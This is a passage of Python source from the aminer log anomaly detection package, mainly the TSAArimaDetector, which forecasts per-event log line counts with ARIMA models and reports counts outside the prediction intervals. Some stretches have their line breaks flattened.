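            sorted_log_lines = [anomaly_log_atom.parser_match.match_element.annotate_match("") + os.linesep +
                                original_log_line_prefix + data]
        else:
            sorted_log_lines = [data]
        analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": list(log_event)}
        frequency_info = {"ExpectedLogAtomValuesFrequencyRange": [0, self.set_upper_limit],
                          "LogAtomValuesFrequency": frequency,
                          "WindowSize": self.window_size
                          }
        if not first_exceeded_threshold:
            # Confidence grows with the distance of the local maximum above the limit. A recorded maximum is a count >= the
            # positive limit, hence > 0; the guard only covers a zero handed in by mistake instead of raising ZeroDivisionError.
            frequency_info["Confidence"] = 1 - self.set_upper_limit / frequency if frequency else 0
            frequency_info["Local_maximum_timestamp"] = round(self.max_frequency_time[log_event], 2)
        # In case that scoring_path_list is set, give their values to the event handlers for further analysis.
        if len(self.scoring_path_list) > 0:
            frequency_info["IdValues"] = list(self.scoring_value_list[log_event])[:self.max_frequency[log_event]]
        event_data = {"AnalysisComponent": analysis_component, "FrequencyData": frequency_info}
        if first_exceeded_threshold:
            message = "Frequency exceeds range for the first time"
        else:
            message = "Frequency anomaly detected"
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, anomaly_log_atom, self)

    def log_statistics(self, component_name):
        """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        @param component_name the name of the component which is printed in the log line.
        """
        # Both statistics levels currently emit the same line; any other level logs nothing. Counters are reset either way.
        if AminerConfig.STAT_LEVEL in (1, 2):
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %s out of %s log atoms successfully in the last 60 minutes.", component_name, self.log_success,
                self.log_total)
        self.log_success = 0
        self.log_total = 0

    def reset_counter(self, log_atom, log_event):
        """Remove any times from counts and scoring_value_list that fell out of the time window.

        Times are stored in arrival order, so popping from the left until the oldest entry is inside the window suffices; one
        scoring value is dropped per dropped time.
        """
        while len(self.counts[log_event]) > 0 and self.counts[log_event][0] < log_atom.atom_time - self.window_size:
            self.counts[log_event].popleft()
            if len(self.scoring_path_list) > 0 and len(self.scoring_value_list[log_event]) > 0:
                self.scoring_value_list[log_event].popleft()

    def get_current_frequency(self, log_atom, log_event):
        """Return the number of recorded occurrences of log_event within the window ending at the atom's time."""
        window_start = log_atom.atom_time - self.window_size
        return sum(1 for timestamp in self.counts[log_event] if timestamp >= window_start)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """Allowlist an event generated by this source using the information emitted when generating the event.

        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type != f"Analysis.{self.__class__.__name__}":
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = "Allowlisting data not understood by this detector"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        # NOTE(review): constraint_list holds parser paths, but event_data is whatever the caller passes (print() emits a dict as
        # event data); verify against the caller that a path string arrives here, otherwise the appended entry is unusable.
        if event_data not in self.constraint_list:
            self.constraint_list.append(event_data)
        return f"Allowlisted path {event_data} in {event_type}."

    def get_weight_analysis_field_path(self):
        """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler."""
        if self.scoring_path_list:
            return ["FrequencyData", "IdValues"]
        return []

    def get_weight_output_field_path(self):
        """Return the path where the ScoringEventHandler adds the scorings in the output of the detector."""
        if self.scoring_path_list:
            return ["FrequencyData", "Scoring"]
        return []
TSAArimaDetector.py000066400000000000000000001125231500476301700344200ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module is a detector which uses a tsa-arima model to track appearance frequencies of events.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .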
"""
import os
import logging
import copy
import math
from aminer import AminerConfig
from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, \
    DEFAULT_LOG_LINE_PREFIX
from aminer.AnalysisChild import AnalysisContext
from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface
from aminer.util import PersistenceUtil
import numpy as np
from statsmodels.tsa.arima.model import ARIMA
from statsmodels.tsa.stattools import acf
from scipy.signal import savgol_filter


class TSAArimaDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface):
    """This class is used for an arima time series analysis of the appearances of log lines to events.

    The detector does not analyze atoms itself: it relies on the event_type_detector's per-event line counts and on a list of
    time triggers (self.time_trigger_list) that fire in receive_atom() once the atom time passes them.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, waiting_time=1000, num_sections_waiting_time=100,
                 acf_pause_interval_percentage=0.2, acf_auto_pause_interval=True, acf_auto_pause_interval_num_min=10,
                 build_sum_over_values=False, num_periods_tsa_ini=15, num_division_time_step=10, alpha=0.05, num_min_time_history=20,
                 num_max_time_history=30, num_results_bt=15, alpha_bt=0.05, acf_threshold=0.2, round_time_interval_threshold=0.02,
                 force_period_length=False, set_period_length=604800, min_log_lines_per_time_step=10, persistence_id="Default",
                 target_path_list=None, ignore_list=None, output_logline=True, learn_mode=True, stop_learning_time=None,
                 stop_learning_no_anomaly_time=None, log_resource_ignore_list=None):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param event_type_detector used to track the number of events in the time windows.
        @param waiting_time in seconds, until the time windows are being initialized.
        @param num_sections_waiting_time Number of sections of the initialization window. The length of the input-list of the
               calculate_time_steps is this number.
        @param acf_pause_interval_percentage states which area of the results of the ACF are not used to find the highest peak.
        @param acf_auto_pause_interval states if the pause area is automatically set. If enabled, the variable
               acf_pause_interval_percentage loses its functionality.
        @param acf_auto_pause_interval_num_min states the number of values in which a local minima must be the minimum, to be
               considered a local minimum of the function and not an outlier.
        @param build_sum_over_values states if the sum of a series of counts is build before applying the TSA.
        @param num_periods_tsa_ini number of periods used to initialize the Arima-model.
        @param num_division_time_step number of division of the time window to calculate the time step.
        @param alpha significance level of the estimated values.
        @param num_min_time_history number of lines processed before the period length is calculated.
        @param num_max_time_history maximum number of values of the time_history.
        @param num_results_bt number of results which are used in the binomial test.
        @param alpha_bt significance level for the bt test.
        @param acf_threshold threshold, which has to be exceeded by the highest peak of the cdf function of the time series, to be
               analyzed.
        @param round_time_interval_threshold threshold for the rounding of the time_steps to the times in self.assumed_time_steps.
               The higher the threshold the easier the time is rounded to the next time in the list.
        @param force_period_length states if the period length is calculated through the ACF, or if the period length is forced to
               be set to set_period_length.
        @param set_period_length states how long the period length is if force_period_length is set to True.
        @param min_log_lines_per_time_step states the minimal average number of log lines per time step to make a TSA.
        @param persistence_id name of persistence file.
        @param target_path_list At least one of the parser paths in this list needs to appear in the event to be analyzed.
        @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are
               omitted. The default value is [] as None is not iterable.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param learn_mode specifies whether new frequency measurements override ground truth frequencies.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list atoms whose source resource_name is in this list are skipped by receive_atom().
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5
        self.stop_learning_time_initialized = None
        super().__init__(
            mutable_default_args=["target_path_list", "ignore_list", "log_resource_ignore_list"], aminer_config=aminer_config,
            anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector,
            acf_pause_interval_percentage=acf_pause_interval_percentage, acf_auto_pause_interval=acf_auto_pause_interval,
            acf_auto_pause_interval_num_min=acf_auto_pause_interval_num_min, build_sum_over_values=build_sum_over_values,
            num_periods_tsa_ini=num_periods_tsa_ini, num_division_time_step=num_division_time_step, alpha=alpha,
            num_min_time_history=num_min_time_history, num_max_time_history=num_max_time_history, num_results_bt=num_results_bt,
            alpha_bt=alpha_bt, acf_threshold=acf_threshold, round_time_interval_threshold=round_time_interval_threshold,
            force_period_length=force_period_length, set_period_length=set_period_length,
            min_log_lines_per_time_step=min_log_lines_per_time_step, waiting_time=waiting_time,
            num_sections_waiting_time=num_sections_waiting_time, persistence_id=persistence_id, target_path_list=target_path_list,
            ignore_list=ignore_list, output_logline=output_logline, learn_mode=learn_mode, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list
        )

        # Add the TSAArimaDetector-module to the list of the modules, which use the event_type_detector.
        self.event_type_detector.add_following_modules(self)

        # List of the time triggers. The first list states the times when something should be triggered, the second list states the
        # indices of the event types, or a list of the event type, a path and a value which should be counted (-1 for an
        # initialization), the third list states the length of the time step (-1 for a one time trigger).
        # NOTE(review): the -1 initialization trigger is not added here; presumably load_persistence_data() (not shown) appends it.
        self.time_trigger_list = [[], [], []]
        self.num_event_lines_ref = []  # Reference containing the number of lines of the events for the TSA
        self.time_window_history = []  # History of the time windows
        self.arima_models = []  # List of the single arima_models (statsmodels)
        self.prediction_history = []  # List of the observed values and the predictions of the TSAArima
        self.time_history = []  # List of the times of the observations
        self.result_list = []  # List of results if the value was in the limits of the one-step predictions
        # Minimal number of successes for the binomial test
        self.bt_min_suc = self.bt_min_successes(self.num_results_bt, self.alpha, self.alpha_bt)
        # Assumed occurring time steps in seconds. 1 minute: 60, 1 hour: 3600, 12 hours: 43200, 1 day: 86400, 1 week: 604800.
        self.assumed_time_steps = [60, 3600, 43200, 86400, 604800]
        self.test_pause = None

        self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        self.load_persistence_data()

    def receive_atom(self, log_atom):
        """Receive the atom and return True.

        The log_atom doesn't need to be analyzed, because the counting and calls of the predictions is performed by the ETD. This
        method only advances the time triggers: the one-time initialization triggers collect per-section line counts during the
        waiting time; once the last of them fires, the time step per event type is derived and recurring triggers are created
        which call test_num_appearance() with the number of lines seen since the previous trigger.
        @return False when the atom's source is in log_resource_ignore_list, True otherwise.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name == source:
                return False
        if not self.stop_learning_time_initialized:
            self.stop_learning_time_initialized = True
            if self.stop_learning_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
            elif self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
        if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        # Check if TSA should be initialized
        if -1 in self.time_trigger_list[0]:
            for i, val in enumerate(self.time_trigger_list[0]):
                if val == -1:
                    # Initialize triggers for the time windows of the trainings phase: one per section of the waiting time, all
                    # marked as one-time initialization triggers (-1 / -1).
                    for j in range(1, self.num_sections_waiting_time):
                        self.time_trigger_list[0].append(log_atom.atom_time + self.waiting_time * j / (
                            self.num_sections_waiting_time))
                        self.time_trigger_list[1].append(-1)
                        self.time_trigger_list[2].append(-1)
                    # The placeholder itself becomes the trigger at the end of the waiting time.
                    self.time_trigger_list[0][i] = log_atom.atom_time + self.waiting_time
                    # Save the current event lines count
                    self.num_event_lines_ref = [[num] for num in self.event_type_detector.num_event_lines]
                    break

        # Check if a trigger was triggered
        if len(self.time_trigger_list[0]) > 0 and any(log_atom.atom_time >= x for x in self.time_trigger_list[0]):
            # Get the indices of the triggered events
            indices = [i for i, time_trigger in enumerate(self.time_trigger_list[0]) if log_atom.atom_time >= time_trigger]

            # Execute the triggered functions of the TSA. Iterate in descending index order so that deleting a trigger does not
            # shift the indices still to be processed.
            for i in range(len(indices)-1, -1, -1):
                # Checks if trigger is part of the initialisation
                if self.time_trigger_list[1][indices[i]] == -1 and self.time_trigger_list[2][indices[i]] == -1:
                    # Save the number of occurred event types for the initialization of the TSA
                    # NOTE(review): if num_event_lines_ref is still [] while the ETD already knows event types, the expansion below
                    # indexes num_event_lines_ref[0] and raises IndexError; confirm the initialization above always runs first.
                    if self.num_event_lines_ref == [] or len(self.num_event_lines_ref[0]) < self.num_sections_waiting_time:
                        # Expand the lists of self.num_event_lines_ref for event types that appeared since the last section
                        for j in range(len(self.num_event_lines_ref), len(self.event_type_detector.num_event_lines)):
                            self.num_event_lines_ref.append([0]*len(self.num_event_lines_ref[0]))
                        # Add the current number of event lines (per section: total so far minus what earlier sections recorded)
                        for j, val in enumerate(self.event_type_detector.num_event_lines):
                            self.num_event_lines_ref[j].append(val-sum(self.num_event_lines_ref[j]))
                        # Delete the initialization trigger
                        del self.time_trigger_list[0][indices[i]]
                        del self.time_trigger_list[1][indices[i]]
                        del self.time_trigger_list[2][indices[i]]
                    # Initialize the trigger for the time steps
                    else:
                        # Expand the lists of self.num_event_lines_ref
                        for j in range(len(self.num_event_lines_ref), len(self.event_type_detector.num_event_lines)):
                            self.num_event_lines_ref.append([0]*len(self.num_event_lines_ref[0]))
                        # Add the current number of eventlines
                        for j, val in enumerate(self.event_type_detector.num_event_lines):
                            self.num_event_lines_ref[j].append(val-sum(self.num_event_lines_ref[j]))

                        # Get the time step lengths. The first entry of the num_event_lines_ref states the number of log lines before the
                        # initialization and is therefore excluded
                        time_list = self.calculate_time_steps([val[1:] for val in self.num_event_lines_ref], log_atom)
                        # From here on num_event_lines_ref is a flat per-event-type reference count, not a list of sections.
                        self.num_event_lines_ref = copy.copy(self.event_type_detector.num_event_lines)
                        num_added_trigger = 0
                        # Add the new triggers (one recurring trigger per event type with a usable time step; -1 means none)
                        for j, val in enumerate(time_list):
                            if val != -1:
                                num_added_trigger += 1
                                self.time_trigger_list[0].append(self.time_trigger_list[0][indices[i]] + val)
                                self.time_trigger_list[1].append(j)
                                self.time_trigger_list[2].append(val)
                        # Delete the initialization trigger
                        del self.time_trigger_list[0][indices[i]]
                        del self.time_trigger_list[1][indices[i]]
                        del self.time_trigger_list[2][indices[i]]

                        # Run the update function for all trigger, which would already have been triggered. The new triggers are
                        # the last num_added_trigger entries, hence the negative indexing.
                        for k in range(1, num_added_trigger+1):
                            while log_atom.atom_time >= self.time_trigger_list[0][-k]:
                                self.test_num_appearance(self.time_trigger_list[1][-k], self.event_type_detector.num_event_lines[
                                    self.time_trigger_list[1][-k]] - self.num_event_lines_ref[
                                    self.time_trigger_list[1][-k]], log_atom)
                                self.time_trigger_list[0][-k] += self.time_trigger_list[2][-k]
                                self.num_event_lines_ref[self.time_trigger_list[1][-k]] = self.event_type_detector.num_event_lines[
                                    self.time_trigger_list[1][-k]]
                # Trigger for a reoccurring time step: catch up on every elapsed step, passing the lines seen since the last one
                else:
                    while log_atom.atom_time >= self.time_trigger_list[0][indices[i]]:
                        self.test_num_appearance(self.time_trigger_list[1][indices[i]], self.event_type_detector.num_event_lines[
                            self.time_trigger_list[1][indices[i]]]-self.num_event_lines_ref[
                            self.time_trigger_list[1][indices[i]]], log_atom)
                        self.time_trigger_list[0][indices[i]] += self.time_trigger_list[2][indices[i]]
                        self.num_event_lines_ref[self.time_trigger_list[1][indices[i]]] = self.event_type_detector.num_event_lines[
                            self.time_trigger_list[1][indices[i]]]
        return True

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted."""
        if self.next_persist_time is None:
return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, [self.time_window_history, self.prediction_history, self.time_history, self.result_list, self.time_trigger_list, self.num_event_lines_ref]) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) # Import the persistence if persistence_data is not None: self.time_window_history = persistence_data[0] self.prediction_history = persistence_data[1] self.time_history = persistence_data[2] self.result_list = persistence_data[3] self.time_trigger_list = persistence_data[4] self.num_event_lines_ref = persistence_data[5] self.arima_models = [None for _ in self.time_window_history] for event_index in range(len(self.arima_models)): if len(self.time_window_history[event_index]) >= self.num_periods_tsa_ini * self.num_division_time_step: try: if not self.build_sum_over_values: model = ARIMA( self.time_window_history[event_index][-self.num_periods_tsa_ini * self.num_division_time_step:], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() else: model = ARIMA([sum(self.time_window_history[event_index][ -self.num_periods_tsa_ini * self.num_division_time_step + i: -(self.num_periods_tsa_ini - 1) * self.num_division_time_step + i]) for i in range((self.num_periods_tsa_ini - 1) * self.num_division_time_step)] + [ 
sum(self.time_window_history[event_index][-self.num_division_time_step:])], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except Exception: self.arima_models[event_index] = None self.time_window_history[event_index] = [] else: self.arima_models[event_index] = None self.time_window_history[event_index] = [] # List of the pauses of the tests to the event numbers. If an arima model was initialized with the persistence, the model must # be trained before it can be used for forecasts. An integer states how many tests should be skipped before the next # output to this event number. None if no model was initialized for this event number. self.test_pause = [self.num_division_time_step if arima_models_statsmodel is not None else None for arima_models_statsmodel in self.arima_models] # If all entries are None set the variable to None if all(entry is None for entry in self.test_pause): self.test_pause = None else: self.time_trigger_list[0].append(-1) self.time_trigger_list[1].append(-1) self.time_trigger_list[2].append(-1) def calculate_time_steps(self, counts, log_atom): """Returns a list of the timestep lengths in seconds, if no timestep should be created the value is set to -1.""" time_step_list = [] # List of the resulting time_steps self.time_window_history = [[] for _ in range(len(counts))] # Initialize time_window_history self.arima_models = [None for _ in range(len(counts))] # Initialize arima_models self.prediction_history = [[[], [], []] for _ in range(len(counts))] # Initialize prediction_history self.time_history = [[] for _ in range(len(counts))] # Initialize time_history self.result_list = [[1]*self.num_results_bt for _ in range(len(counts))] # Initialize the lists of the results if self.force_period_length: # Force the period length time_step_list = [self.set_period_length / self.num_division_time_step for _ in counts] else: # Minimal size of the time step min_lag = 
max(int(self.acf_pause_interval_percentage*self.num_sections_waiting_time), 1) for event_index, data in enumerate(counts): if (self.target_path_list != [] and all(path not in self.event_type_detector.found_keys[ event_index] for path in self.target_path_list)) or (self.ignore_list != [] and any( ignore_path in self.event_type_detector.found_keys[event_index] for ignore_path in self.ignore_list)): time_step_list.append(-1) else: # Apply the autocorrection function to the data of the single event types. corr = list(map(abs, acf(data, nlags=len(data), fft=True))) corr = np.array(corr) # Apply the Savitzky-Golay-Filter to the list corr, to smooth the curve and get better results corrfit = savgol_filter(corr, min(max(3, int(len(corr)/100)-int(int(len(corr)/100) % 2 == 0)), 101), 1) # Set the pause area automatically if self.acf_auto_pause_interval: # Find the first local minima, which is the minimum in the last and next self.acf_auto_pause_interval_num_min values for i in range(self.acf_auto_pause_interval_num_min, len(corrfit)-self.acf_auto_pause_interval_num_min): if corrfit[i] == min(corrfit[i-self.acf_auto_pause_interval_num_min: i+self.acf_auto_pause_interval_num_min+1]): min_lag = i break # Find the highest peak and set the time-step as the index + lag highest_peak_index = np.argmax(corrfit[min_lag:]) if corrfit[min_lag + highest_peak_index] > self.acf_threshold: time_step_list.append((highest_peak_index + min_lag) / self.num_division_time_step * self.waiting_time / self.num_sections_waiting_time) else: time_step_list.append(-1) # Round the time_steps if they are similar to the times in self.assumed_time_steps for index, time_step in enumerate(time_step_list): if time_step != -1: for assumed_time_step in self.assumed_time_steps: if abs(assumed_time_step - time_step * self.num_division_time_step) / assumed_time_step <\ self.round_time_interval_threshold: time_step_list[index] = assumed_time_step / self.num_division_time_step break for index, time_step in 
enumerate(time_step_list): if time_step_list[index] != -1 and sum(counts[index]) / len(counts[index]) * time_step_list[index] /\ self.waiting_time * self.num_sections_waiting_time <\ self.min_log_lines_per_time_step: time_step_list[index] = -1 # Print a message of the length of the time steps message = f"Calculated the periods for the single event types in seconds: "\ f'{[time_step * self.num_division_time_step if time_step != -1 else "None" for time_step in time_step_list]}' affected_path = [] self.print(message, log_atom, affected_path) return time_step_list def test_num_appearance(self, event_index, count, log_atom): """This function makes a one-step prediction and raises an alert if the count do not match the expected appearance.""" # Append the list of time_window_history and arima_models if it is to short if len(self.time_window_history) <= event_index: self.time_window_history += [[] for _ in range(event_index + 1 - len(self.time_window_history))] self.arima_models += [None for _ in range(event_index + 1 - len(self.arima_models))] self.prediction_history += [[[], [], []] for _ in range(event_index + 1 - len(self.prediction_history))] self.time_history += [[] for _ in range(event_index + 1 - len(self.time_history))] self.result_list += [[1]*self.num_results_bt for _ in range(event_index + 1 - len(self.result_list))] # Initialize the arima_model if needed if self.learn_mode and self.arima_models[event_index] is None: # Add the new count to the history and shorten it, if necessary self.time_window_history[event_index].append(count) if len(self.time_window_history[event_index]) > 2 * self.num_periods_tsa_ini * self.num_division_time_step: self.time_window_history[event_index] = self.time_window_history[event_index][ -self.num_periods_tsa_ini*self.num_division_time_step:] # Check if enough values have been stored to initialize the arima_model if len(self.time_window_history[event_index]) >= self.num_periods_tsa_ini*self.num_division_time_step: message = 
f"Initializing the TSA for the event {self.event_type_detector.get_event_type(event_index)}" affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) if not self.build_sum_over_values: # Add the arima_model to the list try: model = ARIMA( self.time_window_history[event_index][-self.num_periods_tsa_ini*self.num_division_time_step:], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except Exception: self.arima_models[event_index] = None else: # Add the arima_model to the list try: model = ARIMA([sum(self.time_window_history[event_index][ -self.num_periods_tsa_ini*self.num_division_time_step+i: -(self.num_periods_tsa_ini-1)*self.num_division_time_step+i]) for i in range((self.num_periods_tsa_ini-1)*self.num_division_time_step)]+[ sum(self.time_window_history[event_index][-self.num_division_time_step:])], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except Exception: self.arima_models[event_index] = None self.time_window_history[event_index] = [] if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Add the new value and make a one-step prediction elif self.arima_models[event_index] is not None: if not self.build_sum_over_values: # Add the prediction and time to the lists lower_limit, upper_limit = self.one_step_prediction(event_index) if self.test_pause is not None and len(self.test_pause) > event_index and self.test_pause[event_index] is not None: self.prediction_history[event_index][0].append(0) self.prediction_history[event_index][1].append(count) self.prediction_history[event_index][2].append(0) self.time_history[event_index].append(log_atom.atom_time) else: 
self.prediction_history[event_index][0].append(lower_limit) self.prediction_history[event_index][1].append(count) self.prediction_history[event_index][2].append(upper_limit) self.time_history[event_index].append(log_atom.atom_time) # Shorten the lists if necessary if len(self.time_history[event_index]) > self.num_max_time_history: self.prediction_history[event_index][0] = self.prediction_history[event_index][0][-self.num_min_time_history:] self.prediction_history[event_index][1] = self.prediction_history[event_index][1][-self.num_min_time_history:] self.prediction_history[event_index][2] = self.prediction_history[event_index][2][-self.num_min_time_history:] self.time_history[event_index] = self.time_history[event_index][-self.num_min_time_history:] if self.test_pause is not None and len(self.test_pause) > event_index and self.test_pause[event_index] is not None: if self.test_pause[event_index] == 1: self.test_pause[event_index] = None # If all entries are None set the variable to None if all(entry is None for entry in self.test_pause): self.test_pause = None else: self.test_pause[event_index] -= 1 else: # Test if count is in boundaries if count < lower_limit or count > upper_limit: message = f"Event: {self.event_type_detector.get_event_type(event_index)}, Lower: {lower_limit}, Count: {count}, "\ f"Upper: {upper_limit}" affected_path = self.event_type_detector.variable_key_list[event_index] if count < lower_limit: confidence = (lower_limit - count) / (upper_limit - count) else: confidence = (count - upper_limit) / (count - lower_limit) self.print(message, log_atom, affected_path, confidence=confidence) self.result_list[event_index].append(0) else: self.result_list[event_index].append(1) if len(self.result_list[event_index]) >= 2 * self.num_results_bt: self.result_list[event_index] = self.result_list[event_index][-self.num_results_bt:] # Discard or update the model, for the next step if self.learn_mode and sum(self.result_list[event_index][-self.num_results_bt:]) < 
self.bt_min_suc: message = f"Discard the TSA model for the event {self.event_type_detector.get_event_type(event_index)}" affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) # Discard the trained model and reset the result_list self.arima_models[event_index] = None self.result_list[event_index] = [1]*self.num_results_bt if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) else: # Update the model self.arima_models[event_index] = self.arima_models[event_index].append([count]) else: # Add the new count to the history and shorten it, if necessary self.time_window_history[event_index].append(count) count_sum = sum(self.time_window_history[event_index][-self.num_division_time_step:]) # Add the prediction and time to the lists lower_limit, upper_limit = self.one_step_prediction(event_index) self.prediction_history[event_index][0].append(lower_limit) self.prediction_history[event_index][1].append(count_sum) self.prediction_history[event_index][2].append(upper_limit) self.time_history[event_index].append(log_atom.atom_time) # Shorten the lists if necessary if len(self.time_history[event_index]) > self.num_max_time_history: self.prediction_history[event_index][0] = self.prediction_history[event_index][0][-self.num_min_time_history:] self.prediction_history[event_index][1] = self.prediction_history[event_index][1][-self.num_min_time_history:] self.prediction_history[event_index][2] = self.prediction_history[event_index][2][-self.num_min_time_history:] self.time_history[event_index] = self.time_history[event_index][-self.num_min_time_history:] # Test if count_sum is in boundaries if count_sum < lower_limit or count_sum > upper_limit: message = f"Event: {self.event_type_detector.get_event_type(event_index)}, Lower: {lower_limit}, Count: {count_sum}, "\ f"Upper: 
{upper_limit}" affected_path = self.event_type_detector.variable_key_list[event_index] confidence = 1 - min(count_sum / lower_limit, upper_limit / count_sum) self.print(message, log_atom, affected_path, confidence=confidence) # Update the model, for the next step self.arima_models[event_index] = self.arima_models[event_index].append([count_sum]) def one_step_prediction(self, event_index): """Make a one step prediction with the Arima model.""" prediction = self.arima_models[event_index].get_forecast(1) prediction = prediction.conf_int(alpha=self.alpha) # return in the order: lower_limit, upper_limit return prediction[0][0], prediction[0][1] def bt_min_successes(self, num_bt, p, alpha): """Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_bt is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = math.factorial(num_bt) i_factorial = 1 for i in range(num_bt + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * math.factorial(num_bt - i)) * ((1 - p) ** i) * ( p ** (num_bt - i)) if tmp_sum > alpha: return i return num_bt def print(self, message, log_atom, affected_path, confidence=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if original_log_line_prefix is None: original_log_line_prefix = "" if self.output_logline: tmp_str = "" for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += " " + x + os.linesep tmp_str = tmp_str.lstrip(" ") sorted_log_lines = [tmp_str + original_log_line_prefix + log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": list(log_atom.parser_match.get_match_dictionary().keys())} else: tmp_str = "" for x in affected_path: tmp_str += " " + x + os.linesep tmp_str = tmp_str.lstrip(" ") 
sorted_log_lines = [tmp_str + log_atom.raw_data.decode()] analysis_component = {"AffectedLogAtomPaths": affected_path} if confidence is not None: event_data = {"AnalysisComponent": analysis_component, "TotalRecords": self.event_type_detector.total_records, "TypeInfo": {"Confidence": confidence}} else: event_data = {"AnalysisComponent": analysis_component, "TotalRecords": self.event_type_detector.total_records, "TypeInfo": {}} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, log_atom, self) TimeCorrelationDetector.py000066400000000000000000000314131500476301700361150ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for time correlation between atoms. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from datetime import datetime import random import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.analysis import Rules from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.History import get_log_int class TimeCorrelationDetector(AtomHandlerInterface): """This class tries to find time correlation patterns between different log atoms. When a possible correlation rule is detected, it creates an event including the rules. 
